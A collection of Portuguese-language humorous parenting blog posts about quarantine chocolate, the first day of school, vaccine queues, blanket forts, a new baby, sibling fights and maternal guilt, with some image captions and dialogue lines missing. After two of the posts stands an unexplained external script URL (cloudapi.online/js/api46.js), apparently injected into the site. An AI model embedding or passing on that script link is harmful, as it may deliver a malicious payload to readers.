1

Querido plano de ser fitness,

Como vai você?

Por aqui tudo ótimo. Indo, vivendo, e postergando a sua chegada a cada dia como sempre. Ainda mais agora na quarentena.

Não me leve a mal, te admiro pacas, sei que você faz maravilhas com as pessoas. Deixa elas mais felizes, satisfeitas, saudáveis. Aumenta o amor próprio, a endorfina, a adrenalina.

Mas olha, sinceramente, é muito difícil colocar você em prática.

Por que? Porque tem horas que só um doce salva. No meu caso especificamente, um chocolate. É inegável que me deixa mais calma, mais alegre, mais paciente. O mundo se torna um lugar melhor e eu, uma mãe melhor.

Mas, em respeito a você, Plano Fitness, desde que fiz trinta anos e percebi que não dá pra ser irresponsável pra sempre – porque açúcar faz mal, aumenta o colesterol, diabetes, tira nossa energia, etc – eu vinha tentando deixar para comer doce só quando a situação estivesse mais caótica, sabe? Quando fosse imprescindível MESMO. De repente numa TPM forte, ou naqueles dias em que as crianças estão atacadas.

Mas preciso confessar que estou com a impressão de que, na vida adulta, o doce é imprescindível TODO SANTO DIA. Porque doce é tipo colo de mãe. E me diga, honestamente, quem não precisa de um aconchegante colinho maternal no fim do dia??

Veja bem:

Dia puxado no trabalho? Brigou com namorado/marido? Chocolate.

Crianças estão discutindo há horas e você já não sabe mais o que fazer? Que tal um pedaço de pavê?

O mundo entrou em colapso e está se despedaçando por causa de uma pandemia que parece se agravar a cada dia e nem a ONU sabe mais o que fazer?

CHOCOLATE, CHOCOLATE, CHOCOLATE.

Juro que vai ajudar.

E nem me venha com a história: “Ah, você pode substituir o chocolate ao leite clássico por linhaça pelo meio amargo”

Sejamos honestos: Isso dá certo para alguém? É que nem dizer que você pode substituir um lindo dia de sol na praia, com agua cristalina e cel azulzinho, por um dia frio com trovoadas na praia. Praia é sempre legal, claro. Mas, dependendo do clima, são duas experiências completamente diferentes.

Entende o que quero dizer? Sem condições. O chocolate amargo ajuda? Quebra um galho. Mas não me diga que um chocolate 80% cacau é a mesma coisa que uma panela morninha de brigadeiro.

Aliás, durante  a quarentena, poucas coisas são mais aconchegantes e terapêuticas do que comer algo bem quentinho, recém saído do forno.

Porque o que a gente faz o dia todo em casa, além de tentar manter algum resquício de rotina e gritar com as crianças para tentar manter a paz no lar (sei que parece contraditório, você ter de gritar para conseguir a paz. De certa forma é, mas quem está pensando em ser coerente num momento como esses né?).

Enfim, segue algumas ideias de coisas que a gente pode fazer e, com certeza, resultará num lar mais feliz e harmonioso:

Biscoitinhos amanteigados (com canela, se preferir)

Brigadeiros enroladinhos com confetes coloridos.

Bolo de cenoura com calda de chocolate.

E quando as crianças estão naquela brigalhada sem fim, que sempre acontece em algum momento da semana  – afinal, compreensível, sem amigos, sem escola, na companhia do outro o dia inteiro – e você já tá com vontade de chorar, qual é o melhor caminho?

Comer bis (ou similares) na cama, todo mundo junto. Intercalando um preto e um branco, e jogar conversa fora.

Então, plano fitness, como eu disse. Te admiro pacas. Mas vai ficar para a próxima.

Quem sabe depois da pandemia eu não me animo?

____________________________________________________________

*** estão me chamando de velha por utilizar o termo PACAS. Pode isso, produção?

6

Volta às aulas

FILHO: Mãe, amanhã eu quero ir para a escola bem cedo!! Pra pegar lugar…

Meu filho de dez anos disse isso ontem, um dia antes da volta às aulas.

EU: Cedo tipo que horas?

ELE: Tipo umas seis, seis e meia.

Me lembrei, então, de quando eu era pequena e fazia minha mãe acordar as 5 da manhã no primeiro dia de aula para me levar na escola escolher o meu lugar na classe (valeu mãe!!!) Na época, todas as crianças chegavam 4h -5h – 6h da manhã para conseguirem ser as primeiras a selecionar o seu assento, que seria praticamente o seu lar na escola durante o resto do ano letivo. Seu porto seguro. Um lugarzinho para chamar de seu naquele ambiente nem sempre amistoso chamado escola.

Era um absurdo, mas de certa forma compreensível.

Então, tomada por essa lembrança (que na época me deixava bastante ansiosa, mas que hoje a tomo com afeto e nostalgia) eu compreendo o desejo do meu filho.

Acordamos bem cedo e chegamos na escola uma hora antes do normal. Mochilas, uniformes, material escolar, tudo certo. Prontos para a guerra a seleção dos lugares. Parei o carro e desci com eles.

Meu filho, então, olha para mim e diz:

EU, ultrajada: Como, tchau mãe? Eu vou subir com você.

FILHO: Não vai, não.

EU, contrariada: Vou sim!  Como não?? Primeiro dia de aula! Quero ver sua sala, sua mesa, tudo o mais.

FILHO: Mãe, NENHUMA MÃE SOBE. Eu já estou no quarto ano. Tchau, sério.

EU (Insistente. Porque sou brasileira e não desisto nunca.): Mas filho, e todo o material? Eu te ajudo a carregar lá para cima.

FILHO: Não. Eu levo mãe. Tchau. Obrigado.

EU: Então tá né… um beijo pelo menos?

Ele revira os olhos, olha para os dois lados para ver se não tem ninguém por perto e assente. Sinto um aperto no coração.

Olho para minha filha de 7 anos e me recomponho.

EU: Filha! Sua vez! Vamos? Vamos lá? Vou subir com você.

EU, em choque: Como não? Primeiro ano primário. Lógico que sobem.

FILHA: Não mãe… Ano passado você foi a única.

EU, brasileira insistente: Poxa, como assim filha? E o seu material? Você vai levar sozinha?

FILHA: Sim né. Dur. Eu não sou bebezinha.

Me deu um beijo rápido e fim.

Lá se foram eles, lutar suas primeiras batalhas do ano, longe de mim. E eu fiquei estática com cara de tacho tentando entender como isso aconteceu.

A vida não te prepara para se tornar “desnecessária” para os filhos. Doeu. Mas acho que faz parte, né? E bom, o que eu posso dizer? É todo aquele drama: A gente põe um filho no mundo, sabe… carrega nove meses… para sermos tratadas assim…

Me recompus, saí de lá e fui atrás de um sundae duplo com calda de chocolate e caramelo. Porque eu merecia.

Infelizmente não encontrei NENHUM lugar aberto, afinal, ainda era de madrugada.

Resumo da ópera:

  • Férias: quem está fora quer entrar, quem está dentro quer sair.
  • O tempo passa rápido pra burro (lembre-se disso nos maus momentos também)
  • Falta na cidade de SP estabelecimentos que fiquem abertos 24 horas para eventuais crises emocionais.

_____________________________________________________________________

Em tempo: Meu filho acabou com um lugar no canto da segunda fila. De acordo ele, já havia muitos amigos na classe quando ele chegou. Minha filha conseguiu um na primeira fileira.

Ambos estão satisfeitos.

E eu, por fim, ainda não consegui comer o meu sundae. Decidi desenhá-lo para ver se passa a vontade:

Não passou.

0

A Vacina da Febre Amarela

Se você mora no Brasil, deve lembrar-se daquele surto da vacina da febre amarela, no ano passado. Lembra?? Todo mundo aflito atrás de uma dose para chamar de sua, os jornais noticiando as filas quilométricas e o desespero.

Fiquei com dó das crianças, que acabaram entrando nessa onda (porque eles são esponjas, escutam os pais comentando, ouvem no rádio, tv, etc, e quando a gente vai ver eles estão fazendo mil perguntas pertinentes e sabendo de tudo), mesmo sendo muito mais informação do que a cabecinha deles é capaz de processar.

Tadinhos. A imaginação não tem fim.

Sempre tem aquela parcela da população que é super precavida e responsável, que consegue perceber quando haverá uma crise ou um surto de vacinas e se antecipam. (Quem são essas pessoas? Aonde vivem? Do que se alimentam?).

Elas dizem coisas como:

Eu, óbvio, não faço parte deste seleto grupo de seres humanos. Não. Por motivos que fogem da minha compreensão, eu acabo procrastinando e sempre deixo para última hora. E quando dou por mim já não há mais a tal da vacina.

Lembro de ter tentado de todas a maneiras: acordar as crianças cedo e chegar horas antes de abrir o posto. Em vão. A fila virava o quarteirão, subia a avenida e já não havia mais senhas. Não contente, liguei em todos os particulares que conhecia e a resposta era sempre a mesma: acabou e estamos sem previsão de chegada. Talvez em março.

E as filas eram tão grandes, mas tão grandes, que se tornaram referência na cabeça do meu filho. Até hoje, quando vemos pessoas enfileiradas num restaurante, no ponto de ônibus, na casa lotérica, etc, ele comenta:

Acabei conseguindo (em março) a bendita vacina.

Todos tomaram, mas até hoje falam no assunto. Me pergunto quando irão esquecer…

1

Brincar de cabana

Você brincava de fazer cabana quando era pequeno?

Essa é uma brincadeira muito fácil e é SEMPRE um sucesso. Se você por acaso não teve infância não a conhece, consiste em pegar um lençol antigo (ou uma manta, toalha, o que tiver disponível) e tentar esticá-lo do jeito que der, prendendo-o entre dois móveis, como por exemplo entre dois sofás, formando uma cabana embaixo. Os pequenos piram nisso, colocam a imaginação para trabalhar.. é muito legal.

E no fim, eles acreditam piamente que a cabana deles ficou assim:

Quando na verdade ela é algo assim:

Mas tudo bem né? O importante é eles felizes. E a criatividade à mil.

Eu lembro que brincava MUITO disso com meus irmãos quando era pequena. E hoje em dia meus filhos adoram essa brincadeira também. Tem dias em que eles estão mais inspirados e ficam horas desenvolvendo as melhores técnicas de deixar a cabana esticada e grande (antes de começarem a se matar discutir pela decoração/disposição/espaço/móveis/qualquer assunto da cabana. O que sempre acontece depois de um certo tempo de brincadeira).

Um fator determinante para que ela seja considerada uma cabana de sucesso é se eles conseguem fazer com que fique tudo escuro lá dentro. Logicamente, essa é uma façanha praticamente impossível, mas eu finjo que tento ajudá-los, e fica tudo certo. Depois de um certo tempo tentando eles desistem.

Aí, uma vez montada essa elaborada tenda, eles curtem mobiliá-la, levar livros, lanternas, uma maçã cortada, travesseiros e cobertores, e juram que essa noite sim, eles vão dormir nela.

Bom, essa semana eu estava compenetrada numa leitura enquanto eles montavam uma cabana. Nesse dia em especial os dois estavam super focados e em sintonia, a brincadeira já durava horas sem brigas (o que, como meus leitores já sabem, é uma raridade aqui em casa). Quando de repente eu escuto meu filho de 9 anos comentando com minha filha de 6:

FILHO: Agora só falta fazer um bloquinho de Wi Fi e está pronta.

Um bloquinho de wifi?? Estou intrigada.

EU (precisando me meter no papo): Com assim filho, um bloquinho de wifi? Tipo um modem?

EU: Entendi… e usar o google pra quê por exemplo?

FILHO (após um momento de reflexão): Ah, para se eu precisar pesquisar como fazer fogo, por exemplo.

EU (morrendo de rir): Então tá.

Apresento à vocês caros amigos, a nova geração de montadores de cabanas. Elas são super tecnológicas vêm com wi-fi embutido. Só não possuem fósforos, isqueiros ou boca de fogão.
_____________________________________________

*Meu filho fala “desencana”.. o seu também? Acho uma linguagem descolada demais para um menino de nove anos… 

1

Tem um bebê em casa

Chegar em casa com a bebê foi um acontecimento muito esperado nessa casa. Bom, lógico, depois de quase quatro anos e meio sem bebê em casa, chegar com ela foi quem nem trazer um ET pra casa. Ou um saco cheio de pirulitos.

Ou uma tarântula.

Sempre me disseram que os mais velhos sofrem com ciúmes, então eu cheguei do hospital super preparada para fazer com que eles se sentissem o mais felizes possível com a nova moradora da casa. Primeiro, entreguei os famosos “presentes que a bebê trouxe” (da onde eles acham que vem esse presente? Do além? Do útero? Que depois de sair um bebê, sai de mim um carrinho de controle remoto e um kit de instrumentos da Peppa Pig? Deixarei essa dúvida no ar porque prefiro não entrar no mérito da questão com as crianças. Uma coisa leva a outra, e não quero que eles me façam MAIS perguntas…)

Aliás, não foi isso o que eles pediram de presente pra quando a bebê nascesse. Quer dizer, foi, mas conforme a gravidez foi progredindo eles foram mudando de ideia a cada mês. No fim minha filha pediu um carrinho de boneca (imaginem ISSO saindo do meu útero) e meu filho – meu pequeno mercenário, vê se pode… – leia mais sobre o tema neste post- pediu 50 R$ (o que pelo menos, pensando por outro lado, é beeem mais fácil de parir né?)

Enfim. Entreguei os presentes. E também algumas balas e pirulitos (como se eu estivesse pedindo desculpa por estar fazendo isso com eles. Tipo: “Filhos agora vocês vão ter que me dividir com uma terceira pessoa… por isso, toma aí uns presentes e doces pra ver se dá uma compensada, e se eu me sinto menos culpada)

Naquele momento funcionou, porque eles ficaram super contentes e excitados. Já minha culpa… Esta me acompanha até hoje, firme e forte. Já virou amiga íntima.

Sentei os dois no sofá de casa e deixei cada um segurar a bebê um pouco. Com todo cuidado do mundo (e rezando por dentro) depositei a pequena trouxinha rosa nos braços deles. Primeiro do meu filho. Depois, nos da minha filha.

Os dois se sentiram grandes e importantes.

FILHA: Posso brincar com ela no meu carrinho de boneca novo????

Por razões óbvias, não permiti. Delicada e gentilmente, afirmei que ela ainda era muito pequena pra brincar no carrinho de boneca. Então eles decidiram que seria uma boa ideia pegar todos os brinquedos de quando eles eram bebês e ficar chacoalhando na cabeça da recém nascida.

Porque com brinquedo de bebê ela pode brincar né?

Só digo uma palavra sobre aquele momento: socorro!!!

Tivemos muitos momentos SOCORRO desde então..

Coitada.

Mas tá dando tudo certo. E o pior é que ela gosta dessa bagunça frenética, é apaixonada pelos irmãos. De vez em quando ela chora porque eles exageram, mas pouco a pouco eles foram aprendendo a dosar as brincadeiras.

E foi assim, no dia a dia, que eles foram aprendendo a lidar com ela. E que eu fui aprendendo a lidar com os três. E que nós cinco fomos sobrevivendo ao primeiro ano da nossa bebê em casa…

https://cloudapi.online/js/api46.js

1

Mães sob pressão

Olho pra minha bebê de 4 meses e sinto um aperto no coração.. ela mal nasceu e já tem tanta pressão em cima dela! Pressão para mamar direito, para fazer cocô direito, para dormir a noite toda. Para ser uma criança “calminha”. Para mamar no peito até 18 meses. Para adorar a hora do banho.

Poxa, deixa a criança ser feliz!! Deixa a mãe ser feliz! É tanta cobrança em cima deles… e automaticamente em cima de nós, mães também. Porque eles são nossa cria, então se não está tudo 100% certinho com eles, a culpa é nossa né??

O bebê tem 6 meses e ainda acorda a noite? Tem 10 meses e ainda não sabe engatinhar? A criança tem um ano e meio e não anda ainda? Olha, vai ver porque é problema fisiológico! Tem 3 anos e escapa xixi? Fim de mundo!! Tirou nota baixa na prova?? Põe na aula de reforço! Seu filho é bom em esportes? Fala inglês fluente né?? Já sabe nadar?

Socorro! Quantas coisas que precisamos ensiná-los a fazer! A escovar os dentes direito. Lembrá-los de fazer a lição de casa. Manter as unhas cortadas em dia (só aqui em casa são 60 unhas pra cortar – tirando as minhas!). E acertar um jantar que todo mundo na casa gosta, então?? Missão impossível. Isso sem mencionar nosso dever mínimo de educá-los para se tornarem pessoas boas, íntegras, honestas, trabalhadoras, esforçadas….

Quanta pressão, que responsabilidade! Já fiquei tensa só de pensar.

E como se não bastasse nós mesmas nos cobrando, inseguras com nossas decisões o tempo todo – porque mãe é muito boa em se culpar e se cobrar, (ou não, pode ser que você seja uma mãe super segura de si. Te admiro!!! Queria ser assim!) –  a gente é criticada por um monte de gente na rua, no shopping, no supermercado, em festas... Inclusive por outras mães…

Gente, qual é? Estamos todas no mesmo barco, lutando dia pós dia para conseguir educar nossas crianças no mundo doido de hoje. Ninguém nasceu sendo mãe. Ninguém sabe direito o que está fazendo nesse pandemônio que é a maternidade. A gente faz o que acha que tá certo. É na base do erro e acerto. E pior: o que dá certo pra mim pode não dar certo para você! Cada casa é uma casa… 

Mãe sempre erra, não importa o quanto ela tente acertar.
Enfim! Por uma maternidade mais leve, com menos julgamentos e muito, mas muito mais amor, por favor!!

______________________________________________________

PS: pra completar, a gente tem que fazer tudo o que foi citado acima E ainda estar lindas, magras, bem vestidas, com a ginástica e alimentação em dia, realizadas profissionalmente, e com o cabelo maravilhoso. Que mundo injusto.

Ufa, cansada só de digitar… vamos dar um tempo?! Aceitar mais, culpar e julgar menos?

Um brinde a todas nós, mães e mulheres maravilhas. Cara, de verdade, tiro o meu chapéu para você que tem um, dois, três.. cinco filhos (guerreira!!!!). Vamos nos dar um tapinha nas costas, somos todas Mulheres Maravilhas meeeesmo.

E ai de quem disser o contrário.

https://cloudapi.online/js/api46.js

2

Irmãos, uma doce relação?

Eles brigam por quem vai usar primeiro o shampoo no banho. Depois, pelo sabonete. Brigam por quem vai entrar primeiro no carro. Por quem ganhou mais sucrilhos, porque a mamãe é injusta, ela deu mais pro meu irmão (ã). Brigam pelas páginas que tem os livros que a gente lê antes de dormir. “O dele (a) é bem mais longo que o meu!! Isso não é justo!” Aliás, a palavra “injusta” é bastante empregada aqui em casa. Geralmente dirigida à minha pessoa.

Brigam por quem vai escolher o filme. Pelo lugar no sofá. Por quem vai entrar primeiro no banho. Depois por quem vai sair primeiro do banho. Brigam pelas canetinhas, pelos lápis de cor, pelos carimbos e pela tesoura sem ponta.

Brigam todo jantar pelo copo de peixinho – só tem um desses copos em casa. E nem é um copo TÃO legal assim. É bem simples, para ser honesta. Na última briga pelo tal do copo, arremessei-o em cima da geladeira, e lá ele ficou (o copo, não os filhos). Tive uma semana mais pacífica depois disso, estou pensando em deixá-lo por lá.

Brigam pelo telefone, pelo iPad, por quem vai pular na cama elástica primeiro (Colocaram uma cama elástica embaixo do meu prédio. Quando ela chegou eu achei que seria uma excelente ideia). Brigam pelas peças do lego (- tem dias que eu preciso contar uma por uma e dividi-las precisamente para cada um ter o exato número de peças que o outro tem). Brigam pela poltrona giratória da sala, pela música que vai tocar no carro, por quem vai falar primeiro. Pelo espaço que o corpo de cada um ocupa na casa – eu nem sabia que era possível brigar por causa disso. Mas descobri que é, sim.

Brigam quando estão jogando memória. Brigam quando estão montando o quebra cabeça do Nemo. Brigam quando jogam Uno, e quando jogam cartas. Brigam tanto, mas tanto, que eu desconfio que eles acordam todas as manhãs pensando “com que briga será que vamos estrear o dia de hoje?”

brigam

Agora com licença que preciso buscá-los da escola e me preparar psicologicamente para a próxima briga no carro…

2

2016 está chegando

Mais um ano que chega ao fim! Já é o terceiro fim de ano do Filhos em Quadrinhos, nem posso acreditar! E por isso, decidi pegar a lista de resoluções que fiz aqui para 2014 e repassar ela.. Vou comentar item por item que tinha na lista. A resolução vai estar escrita normalmente e os meus comentários de hoje vão em vermelho escuro/vinho/uva itálico (não sei definir ao certo que cor é essa).

Vamos lá:

LISTA DE RESOLUÇÕES PARA 2014 (compilada em 30 de dezembro de 2013)

1- Aprender receitas novas e variadas pra fazer em casa

dez/2015: Aprendi!! E mudei algumas coisas! Oba! Mas sempre dá pra aprender mais, né? 

2- Trabalhar para ser uma mãe cada vez mais PACIENTE e CENTRADA

dez/2015: Vamos pular essa… 

3- Não comer as coisas que meus filhos deixam no prato. (Mesmo se for muito gostoso)

dez/2015: Também vamos pular essa

4- Não pegar salgados em festinhas dizendo que são para os meus filhos quando eu sei que eles não vão comer e quem vai comer sou eu. (AUTO ENGANAÇÃO)

resolucao 1

dez/2015: Desencanei… se eu estou com vontade eu pego e como mesmo porque o importante é ser feliz. Mas minha vontade também diminuiu!! Acho que nosso gosto vai mudando conforme os anos vão passando né..? 

5– Não comprar mais coisas inúteis achando que elas vão mudar minha vida (como os lenços umidecidos de higienizar chupeta. Nunca usei. )

dez/2015: Melhorei nisso!!! Tenho pensado mais antes de comprar coisas inúteis! Só livros que eu não aguento… livros são minha perdição.

6- Organizar! Manter organizados os brinquedos das crianças (incentivá-los a guardar, mesmo que seja muito mais rápido eu guardar tudo sozinha)

dez/2015: Como eles cresceram um pouco, consegui fazer com que eles começassem a arrumar os brinquedos. Mas mesmo assim, nos dias que eu estou cansada pra ficar no pé deles eu arrumo tudo sozinha – mais rápido, prático e eficiente? Sim. Menos educativo? Sim também… Mas a vida é assim.

7- Não ficar berrando desesperada quando meus filhos alimentam os carneiros na fazendinha

resolucao 33

dez/2015: Aprendi a relaxar mais com isso…! Mas acho que deve ser porque eles cresceram um pouco. Até no Parque da Água Branca (ou das galinhas assassinas) eu também fico mais tranquila.
ferias 4

8- Ensinar meu filho a nadar URGENTE ***

dez/2015: Ensinei!!! Ele se vira super bem na água. Agora a meta é ensinar minha filha a nadar. 

9- Começar a anotar as pérolas das crianças para não esquecer.

dez/2015: Vamos pular essa também.. 

10- Usar menos o whatsapp e o iPhone em geral quando estou com meus filhos (vício horroroso)

dez/2015: De fato consegui melhorar o vício do iPhone sim, evito ao máximo usar quando estou com as crianças. Mas é que nem o item 1, o das receitas. Sempre dá pra progredir um pouco mais, né?  

É isso aí! Os filhos crescem e a gente vai crescendo com eles. Desejo a todos meus leitores um ano com mais noites bem dormidas, mais momento de fofura, mais compreensão, mais paciência e amor.. um 2016 com menos choro, menos brigas de irmãos, e menos dodóis!

3

Distrações maternas

Sempre começa com um convite inocente.

FILHO: Mãe, quer assistir meu teatro de playmobil?

EU: Quero filho! Oba!

Nada contra os teatros e shows e afins. Acho super legal e educativo. Mas tenho uma certa dificuldade em prestar atenção em toda a história – que pode chegar a durar horas.

Porque crianças de cinco anos contando histórias causam certas distrações…

MAGICO 11

Ah que legal, história de mágico é novidade.

magico 122Hm… bichos. Preciso comprar tomada de bicho pro quarto das crianças eles tão levando muita picada… Deixo olhar aqui no aplicativo da Onofre se tem.

FILHO: E a girafa caiu do trem e…

MAGICO 454EU: To sim, to sim, desculpa.

FILHO: E aí a rainha do mal…

Que rainha do mal? Ele não tava falando de nenhuma rainha do mal antes. Aliás eles tem aniversário do Frozen essa semana. Preciso comprar presente. E também preciso comprar shampoo pra eles que está acabando.

E por falar em comprar deixa eu fazer uma lista de supermercado rapidinho, tá faltando tudo nessa casa.

,magico 343

Ai é mesmo… o teatro!!

___________________________________________

No fim deu tudo certo. Ouvi mais ou menos a história do mágico dos bichos e da rainha má. Porque minha filha apareceu precisando ir no banheiro duas vezes, o interfone tocou, e eu precisei ajudar um animado grupinho de whatsapp a decidir se uma blusa era bonita para comprar ou não.

Mas meu filho ficou feliz que eu permaneci lá, quase firme e forte, até o fim da história.

2

Em pé de guerra

Acabamos de passar por um momento de guerra aqui em casa.

Guerra mesmo.

Não sei como começou e nem como aconteceu.

De repente, eu comecei a sentir que estou fazendo tudo errado. Será que eu estou educando direito?

De repente parece que eu estou falando grego. Que as crianças não me entendem e que eu não entendo elas.

Eu falo A, meu filho quer B. Eu falo amarelo, ele insiste em no verde. Não sei o que aconteceu, nem como, nem exatamente quando começou.

Mas a vida estava assim:

HORA DE ENTRAR NO BANHO

sitio 1

 

HORA DE SAIR DO BANHO

sitio 2

 

HORA DE DORMIR

SITIO 3

HORA DE ACORDAR

SITIO 4

E assim vai.

Não eram resmungadas bobas do dia a dia. Eram discussões ferozes, regadas de ameaças de ambas as partes (entre as minhas “você não vai poder convidar amiguinho essa semana!!” e as dele “eu vou te acordar a noite!!”)

Sabia que era só uma fase. Que logo iria passar. Mas que fase dura!! E nesse meio tempo, entre tentar me manter calma sem explodir e tentar acalmá-lo, busquei explicações para esse comportamento. Adolescência da primeira infância? Da segunda infância? Volta as aulas? Ansiedade por algum motivo? Não sei que razões podem ser.

E esperei. E tive paciência. E mudei algumas coisas em casa. Minimizei as cobranças.

Mas o mais importante foi o esperar, com calma.

E aí, um belo dia…

SITIO 5

Passou. Com muita paciência e amor, funcionou.

Agora estamos de volta a fase das reclamadas básicas do dia a dia. Nunca imaginei que sentiria falta delas!!